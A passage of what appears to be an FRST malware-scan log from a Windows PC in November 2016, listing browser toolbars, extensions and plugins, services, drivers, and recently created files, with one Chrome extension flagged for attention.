Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {6857857C-15D3-435D-AF19-E0217298B416} -  No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {EF91116F-DE92-4286-9087-093085152182} -  No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {41977804-C772-4713-BD5F-F4C56BF4CE89} -  No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {0B9F58EF-90CC-2474-09B9-80B8E9DD43CA} -  No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.8.1.14\coIEPlg.dll [2016-11-11] (Symantec Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Kenneth\AppData\Roaming\Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775 [2016-11-23]
FF Homepage: Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775 -> hxxp://www.yahoo.com/
FF Extension: (Maps) - C:\Users\Kenneth\AppData\Roaming\Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775\Extensions\@Maps.xpi [2016-02-27]
FF Extension: (Awesome Screenshot - Capture, Annotate & More) - C:\Users\Kenneth\AppData\Roaming\Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775\Extensions\[email protected] [2016-09-23]
FF Extension: (Emoji Cheatsheet for GitHub, Basecamp etc.) - C:\Users\Kenneth\AppData\Roaming\Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775\Extensions\[email protected] [2016-08-15]
FF Extension: (Adblock Plus) - C:\Users\Kenneth\AppData\Roaming\Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-10-28]
FF SearchPlugin: C:\Users\Kenneth\AppData\Roaming\Mozilla\Firefox\Profiles\f5w5i3ez.default-1442976934775\searchplugins\norton-safe-search.xml [2015-11-03]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.2.15\coFFAddon
FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.2.15\coFFAddon [2016-11-22]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-08-11] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\NetRatingsNetSight\NetSight\meter1\FirefoxAddOns\[email protected] => not found
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_22.5.2.15\coFFAddon
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-05-23] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{22119944-ED35-4ab1-910B-E619EA06A115}] - C:\Program Files (x86)\Siber Systems\AI RoboForm\Firefox\roboform.xpi
FF Extension: (RoboForm Toolbar) - C:\Program Files (x86)\Siber Systems\AI RoboForm\Firefox\roboform.xpi [2016-09-02]
FF HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Firefox\Extensions: [{22119944-ED35-4ab1-910B-E619EA06A115}] - C:\Program Files (x86)\Siber Systems\AI RoboForm\Firefox\roboform.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nielsen/FirefoxTracker -> C:\Program Files (x86)\NetRatingsNetSight\NetSight\meter1\FirefoxAddOns\npfirefoxtracker.dll [No File]
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2014-12-13] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprjplug;version=15.0.6.14 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprjplug.dll [2012-10-04] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [2012-10-04] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [2012-10-04] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2014-12-13] (RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-01-11] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1169555862-3845460206-1416485692-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Kenneth\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2013-05-11] (Citrix Online)
FF Plugin HKU\S-1-5-21-1169555862-3845460206-1416485692-1000: @hulu.com/Hulu Desktop -> C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.13.1\npHDPlg.dll [2010-04-09] (Hulu LLC)
FF Plugin HKU\S-1-5-21-1169555862-3845460206-1416485692-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Kenneth\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll [2014-07-24] (Skype Limited)
FF Plugin HKU\S-1-5-21-1169555862-3845460206-1416485692-1000: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\Kenneth\AppData\Roaming\CATALI~2\NPBCSK~1.DLL [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2012-06-30] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppl3260.dll [2014-12-13] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nprjplug.dll [2012-10-04] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nprpplugin.dll [2014-12-13] (RealPlayer Cloud)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR StartupUrls: Default -> "hxxp://www.yahoo.com/"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_chr_syc_oracle&type=default
CHR DefaultSearchKeyword: Default -> Yahoo
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/ie?output=fxjson&command={searchTerms}&nResults=10
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\pdf.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\gcswf32.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_2_202_235.dll => No File
CHR Plugin: (United MileagePlus Shopping Assistant) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\cbcdijacbpcopcaejdbbnepdkljlckol\1.0.0.6_0\plugin/UnitedMPSPlugin.dll => No File
CHR Plugin: (RoboForm Plugin for Google Chrome/Opera/etc.) - C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\plugin/rf-np-plugin.dll (Siber Systems Inc.)
CHR Plugin: (Skype Click to Call) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl\5.11.0.9874_0\npSkypeChromePlugin.dll => No File
CHR Plugin: (Norton Confidential) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk\2012.5.3.7_0\npcoplgn.dll => No File
CHR Plugin: (Microsoft® Windows Media Player Firefox Plugin) - C:\Program Files (x86)\Mozilla Firefox\plugins\np-mswmp.dll (Microsoft Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (WildTangent Games App Presence Detector) - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll ()
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Facebook Video Calling Plugin) - C:\Users\Kenneth\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
CHR Plugin: (Google Update) - C:\Users\Kenneth\AppData\Local\Google\Update\1.3.21.111\npGoogleUpdate3.dll => No File
CHR Plugin: (Hulu Desktop) - C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.13.1\npHDPlg.dll (Hulu LLC)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\4.1.10329.0\npctrl.dll => No File
CHR Profile: C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default [2016-11-23]
CHR Extension: (Norton Security Toolbar) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-11-18]
CHR Extension: (Norton Home Page for Chrome) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejbdobdndcjhdmljipngpeoekdinlohe [2016-03-23]
CHR Extension: (Norton Identity Safe) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2015-02-12]
CHR Extension: (Skype) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-25]
CHR Extension: (PicBadges) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgjkknncnlepghplinfpikcijdbmidbg [2015-02-12] [UpdateUrl: hxxp://static.picbadges.com/plugin/chrome-updates.xml] <==== ATTENTION
CHR Extension: (Norton Safe) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmgcfemagnogdodbambjhdcmfcpicngl [2016-09-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-26]
CHR Extension: (RoboForm Password Manager) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnlccmojcmeohlpggmfnbbiapkmbliob [2016-11-10]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\Exts\Chrome.crx [2016-11-16]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKLM\...\Chrome\Extension: [pnlccmojcmeohlpggmfnbbiapkmbliob] - C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\rf-chrome.crx [2014-06-16]
CHR HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\Exts\Chrome.crx [2016-11-16]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKLM-x32\...\Chrome\Extension: [pnlccmojcmeohlpggmfnbbiapkmbliob] - C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\rf-chrome.crx [2014-06-16]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [365568 2011-03-09] (Advanced Micro Devices, Inc.) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2013-12-16] (WildTangent)
R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [250712 2013-12-30] (Garmin Ltd or its subsidiaries)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [86528 2012-09-27] (Hewlett-Packard Company) [File not signed]
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-23] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-23] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed]
R2 IDriveService; C:\Program Files (x86)\IDriveWindows\id_service.exe [154656 2016-01-18] (Prosoftnet)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-24] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-24] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2011-09-16] (LogMeIn, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.427\McCHSvc.exe [329480 2016-10-13] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\NIS.exe [289080 2016-11-12] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1127448 2011-02-01] (PDF Complete Inc)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
R2 PRTGCoreService; C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe [6917904 2013-03-04] (Paessler AG)
R2 PRTGProbeService; C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe [8495376 2013-03-04] (Paessler AG)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] ()
R2 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2014-12-13] (RealNetworks, Inc.)
R2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] ()
R2 Unchecky; C:\Program Files (x86)\Unchecky\bin\unchecky_svc.exe [161744 2015-03-11] (RaMMicHaeL) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
S4 CarboniteService; "C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe" [X]
S2 TransferService; "C:\Program Files (x86)\MR APP\MRAPP.Transfer.Service.exe" [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\BASHDefs\20161121.001\BHDrvx64.sys [1874136 2016-11-07] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1608010.00E\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-03] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-03] (Symantec Corporation)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2015-02-03] ()
R1 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\IPSDefs\20161122.001\IDSvia64.sys [1012952 2016-10-27] (Symantec Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-05-29] (LogMeIn, Inc.)
S4 LMIRfsClientNP; no ImagePath
R1 SRTSP; C:\Windows\System32\Drivers\NISx64\1608010.00E\SRTSP64.SYS [784624 2016-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1608010.00E\SRTSPX64.SYS [49400 2016-11-11] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NISx64\1608010.00E\SYMEFASI64.SYS [1628888 2016-11-11] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-16] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1608010.00E\Ironx64.SYS [289520 2016-11-11] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NISx64\1608010.00E\SYMNETS.SYS [567512 2016-11-11] (Symantec Corporation)
S3 usbbus; C:\Windows\System32\DRIVERS\lgx64bus.sys [17920 2008-11-11] (LG Electronics Inc.)
S3 UsbDiag; C:\Windows\System32\DRIVERS\lgx64diag.sys [27136 2008-11-11] (LG Electronics Inc.)
S3 USBModem; C:\Windows\System32\DRIVERS\lgx64modem.sys [33792 2008-11-11] (LG Electronics Inc.)
R3 WPRO_41_2001; C:\Windows\System32\drivers\WPRO_41_2001.sys [35344 2016-11-23] ()
S3 AODDriver4.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S3 cpuz134; \??\C:\Users\Kenneth\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\SDSDefs\20160701.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\SDSDefs\20160701.001\EX64.SYS [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\TurboYourPC\Service.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-23 18:28 - 2016-11-23 18:28 - 02412032 _____ (Farbar) C:\Users\Kenneth\Downloads\FRST64 (2).exe
2016-11-23 18:28 - 2016-11-23 18:28 - 02412032 _____ (Farbar) C:\Users\Kenneth\Downloads\FRST64 (1).exe
2016-11-23 18:26 - 2016-11-23 18:27 - 00000000 ____D C:\Users\Kenneth\Downloads\FRST-OlderVersion
2016-11-23 18:06 - 2016-11-23 18:06 - 00096784 _____ (CACE Technologies) C:\Windows\SysWOW64\WPRO_41_2001woem.tmp
2016-11-22 13:24 - 2016-11-22 13:24 - 00004168 _____ C:\Windows\System32\Tasks\PCM_Kenneth_PCMedic_RS_WeeklyTask
2016-11-22 13:24 - 2016-11-22 13:24 - 00003620 _____ C:\Windows\System32\Tasks\PCM_Kenneth_PCMedic_LogonTask
2016-11-22 13:23 - 2016-11-22 13:23 - 00001006 _____ C:\Users\Public\Desktop\PC Medic.lnk
2016-11-22 13:23 - 2016-11-22 13:23 - 00000000 ____D C:\ProgramData\PCMedic
2016-11-22 13:23 - 2016-11-22 13:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Medic
2016-11-22 13:23 - 2016-11-22 13:23 - 00000000 ____D C:\Program Files (x86)\PC Medic
2016-11-22 13:21 - 2016-11-22 13:21 - 00907392 _____ (KeySolutionsIO Inc. ) C:\Users\Kenneth\Downloads\PCMedic-Setup.exe
2016-11-22 11:34 - 2016-11-23 18:06 - 00035344 _____ C:\Windows\system32\Drivers\WPRO_41_2001.sys
2016-11-22 00:54 - 2016-11-22 00:54 - 00000000 ____D C:\Windows\System32\Tasks\Norton Internet Security
2016-11-22 00:44 - 2016-11-22 00:44 - 00003234 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2016-11-19 11:53 - 2016-11-19 11:53 - 00001165 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-11-19 11:53 - 2016-11-19 11:53 - 00001153 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-11-19 11:42 - 2016-11-19 11:42 - 00243600 _____ C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0 (1).exe
2016-11-19 11:41 - 2016-11-19 11:41 - 00243600 _____ C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0.exe
2016-11-18 14:50 - 2016-11-18 14:50 - 00000000 ____D C:\Users\Kenneth\AppData\Local\0de59
2016-11-18 11:52 - 2016-11-23 00:23 - 00000000 ____D C:\Users\Kenneth\AppData\LocalLow\Mozilla
2016-11-17 13:42 - 2016-11-19 11:53 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-12 07:31 - 2016-10-27 21:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-11-12 07:31 - 2016-10-27 21:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-11-12 07:31 - 2016-10-27 13:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-11-12 07:31 - 2016-10-27 13:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-11-12 07:31 - 2016-10-27 12:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-11-12 07:31 - 2016-10-27 12:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-11-12 07:31 - 2016-10-27 12:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-11-12 07:31 - 2016-10-27 12:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-11-12 07:31 - 2016-10-27 12:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-11-12 07:31 - 2016-10-27 12:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-11-12 07:31 - 2016-10-27 12:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-11-12 07:31 - 2016-10-27 12:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-11-12 07:31 - 2016-10-27 12:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-11-12 07:31 - 2016-10-27 12:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-11-12 07:31 - 2016-10-27 12:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-11-12 07:31 - 2016-10-27 12:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-11-12 07:31 - 2016-10-27 12:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-11-12 07:31 - 2016-10-27 12:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-11-12 07:31 - 2016-10-27 12:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
